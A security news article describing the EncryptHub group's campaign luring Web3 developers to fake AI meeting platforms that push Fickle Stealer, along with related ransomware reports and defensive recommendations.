EncryptHub Targets Web3 Developers with Fake AI Malware
EncryptHub Targets Web3 Developers with Fake AI Platforms and Fickle Stealer Malware
What is EncryptHub and Their Latest Attack Campaign
EncryptHub, also known as LARVA-208 and Water Gamayun, is a financially motivated threat actor group that has launched a sophisticated new campaign targeting Web3 developers. This cybercriminal organization has evolved from deploying ransomware to using information stealer malware to harvest sensitive data from cryptocurrency wallets and development credentials.
How EncryptHub Targets Web3 Developers
Why Web3 Developers Are Prime Targets
Web3 developers present an ideal target for cybercriminals due to several factors:
Management of cryptocurrency wallets with high-value assets
Access to smart contract repositories and sensitive test environments
Many work as freelancers or across multiple decentralized projects
Lack of traditional enterprise security controls protection
High-value targets that can be monetized quickly
The Fake AI Platform Deception
EncryptHub operators create convincing fake artificial intelligence platforms, including Norlax AI that mimics legitimate services like Teampilot. These deceptive platforms serve as the primary attack vector for luring unsuspecting Web3 developers.
The Attack Chain: From Social Engineering to Malware Deployment
Initial Contact and Social Engineering
The attack begins with threat actors contacting Web3 developers through multiple channels:
Direct messages on X (formerly Twitter) and Telegram
Job interview requests targeting developers following Web3 and blockchain content
Portfolio review offers sent through professional networks
Job applications posted on Remote3, a Web3-specific job board
Bypassing Security Warnings
To circumvent security warnings issued by platforms like Remote3, attackers employ a clever two-stage approach:
Initial conversation conducted via legitimate Google Meet
Transition to the fake Norlax AI platform under the pretext of continuing the interview
The Malware Deployment Process
Once victims access the fake meeting platform, they encounter:
Email address and invitation code entry requirements
Fake error messages claiming outdated or missing audio drivers
Download prompts for malicious software disguised as Realtek HD Audio Driver
PowerShell command execution to retrieve and deploy Fickle Stealer malware
Fickle Stealer: The Primary Malware Payload
Capabilities and Data Harvesting
Fickle Stealer is a sophisticated information-stealing malware that targets:
Cryptocurrency wallet credentials and private keys
Development environment access credentials
Sensitive project data and source code
Browser-stored passwords and authentication tokens
System information and network configurations
Data Exfiltration to SilentPrism
All harvested information is transmitted to an external command-and-control server codenamed SilentPrism, where cybercriminals can access and monetize the stolen data through illicit markets.
Recent Developments: Steam Game Compromise
Chemia Game Infiltration
In July 2025, researchers discovered that EncryptHub had compromised a Steam game called Chemia to distribute malware. Key details include:
Malicious binaries embedded directly into the game executable
Distribution of both Fickle Stealer and Hijack Loader
Hijack Loader subsequently drops Vidar Stealer
Game removed from Steam platform following discovery
Emerging Ransomware Threats: KAWA4096 and Crux
KAWA4096 Ransomware Characteristics
A new ransomware strain called KAWA4096 has emerged with notable features:
Style similarities to Akira ransomware group
Ransom note format resembling Qilin ransomware
Targets primarily in United States and Japan
Advanced multithreading capabilities for faster encryption
Network drive encryption capabilities
Crux Ransomware Operations
The Crux ransomware group claims association with BlackByte and demonstrates:
Use of valid RDP credentials for initial access
Legitimate Windows tools for stealth operations
Boot configuration modifications to prevent system recovery
Preference for processes like svchost.exe and bcdedit.exe
Protection Strategies for Web3 Developers
Security Best Practices
To protect against EncryptHub and similar threats, Web3 developers should:
Verify legitimacy of job opportunities and portfolio review requests
Use only official communication channels for professional interactions
Implement multi-factor authentication on all development accounts
Maintain offline backups of cryptocurrency wallet keys
Regular security awareness training focused on social engineering
Technical Security Measures
Deploy endpoint detection and response (EDR) solutions
Monitor for suspicious PowerShell activity
Implement application whitelisting for development environments
Regular vulnerability assessments and penetration testing
Network segmentation to limit lateral movement
Industry Response and Future Implications
Shift in Cybercriminal Monetization
EncryptHub's evolution from ransomware to information stealing represents a broader trend in cybercrime monetization strategies. The focus on cryptocurrency-related targets reflects the high-value nature of Web3 assets and the relatively immature security posture of the decentralized finance ecosystem.
Recommendations for Web3 Organizations
Organizations in the Web3 space should prioritize:
Enhanced security awareness training for development teams
Implementation of zero-trust security architectures
Regular security audits of development environments
Incident response planning specific to cryptocurrency theft
Collaboration with threat intelligence providers for early warning systems
Conclusion
The EncryptHub campaign against Web3 developers represents a sophisticated evolution in cybercriminal tactics, combining social engineering with advanced malware deployment techniques. As the Web3 ecosystem continues to grow, security measures must evolve to protect valuable cryptocurrency assets and development infrastructure from these targeted attacks.
For more Crypto, Web3, Blockchain & AI news visit : www.metamoonmedia.com